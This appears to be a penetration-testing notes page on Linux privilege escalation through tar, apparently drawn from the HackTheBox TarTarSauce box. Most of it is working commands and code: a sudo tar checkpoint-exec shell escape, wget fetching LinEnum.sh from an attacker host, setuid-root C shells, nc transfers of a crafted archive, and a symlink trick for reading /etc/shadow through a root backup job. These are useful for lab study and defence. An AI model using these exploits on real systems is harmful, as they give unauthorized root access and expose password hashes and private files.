TAR backups
Easy PrivEsc
> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally
Backup Script Vulnerability
If root is doing anything as a job, you can attempt to re-direct it
Copy the script back to your host and decompose it for analysis
Examples of root running TAR:
Extracting TAR
Just like NFS Root Squashing
Similar to "NFS Root Squashing" and the "jail" box
Make setuid root owned
gzip the setuid
copy back inject into the 'temp' check folder
root will extract to 'check' the files
and thinks it belongs to him!
REF: NFSRootSquash
Backup Script Discovery
Enum to find the backup/script/job running
Works just fine as 'user'
cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
pspy32 ..get more details
locate backuperer ..investigate
Backup Flaw Scenario
Backup script runs TAR as Root every 5 minutes
Deletes the previous checks: /var/tmp/.* and /var/tmp/check.
Creates a gzip file of the directory /var/www/html with user-perms
Saves it in the file /var/tmp/.randomsha1
Sleeps for 30 seconds.
Creates the directory /var/tmp/check
Extracts gzip with Root /var/tmp/.randomsha1 to /var/tmp/check
If /var/www/html is different from backup: /var/tmp/check/var/www/html
Report error.
Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-wwww-dev.bak
And delete 'check' directory and .randomsha1
Backup Flaw Exploit #1
Script design is to tar as user, then untar as root
Then compare previous version (which gives us 5 minutes)
We can inject our evil tar:
Script will: tar/copy/extract/compare.. and fail with error..
Giving us 5 minutes to use root-unzipped-files
Create the evil setuid
----------------------------
gcc ..installed?
locate -r gcc$
kali:
uname -a ..we have 32bit (should match target)
cp /opt/shells/setuid.c .
----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main ( int argc, char *argv[] )
{
setreuid(0,0);
execve("/bin/sh", NULL, NULL);
}
----------------------------
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
----------------------------
gcc
apt search gcc-multilib
Compile
gcc -m32 -o setuid setuid.c ..32 bit compile
TAR the evil suid
TAR embeds the userid that owns the file - in the actual archive
We create this file and TAR as root .. it will stay root when extracted
----------------------------
kali:
sudo -i ..do this work as root
mkdir -p var/www/html ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid ..set the suid bit
chmod u+s var/www/html/suid ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/ ..mock tar
send:
nc -nlvp 9002 < setuid.tar.gz
-----------------------
target:
> cd /var/tmp
> nc $MyIP 9002 > setuid.tzt.gz
> watch -n 1 'systemctl list-timers'
created '.6683a76af11' ..temp extract
> cp setuid.tar.gz .6683a76af11 ..INJECTED !!!
> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'
> cd check/var/www/html
> ls -la
rsuid owned by root and suid-bit-set !!
>./ rsuid
whoami root!
Backup Flaw Exploit #2
diff runs as root
updates to readable error file:
/var/backups/onuma_backup_test.txt
tar an evil symlink that root will extract/diff
cd /var/tmp/var/www/html
ln -s /etc/shadow index.html ..symlink
ln -s /root/root.txt index.html ..alternate
cat index.html ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/ ..mock tar
watch -n 1 'systemctl list-timers'
created '.17f6c199' ..temp extract
> cp symlink.tar.gz .17f6c199 ..swap our evil-tar-sym
job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !
REF
tartarHTB
Last updated
Was this helpful?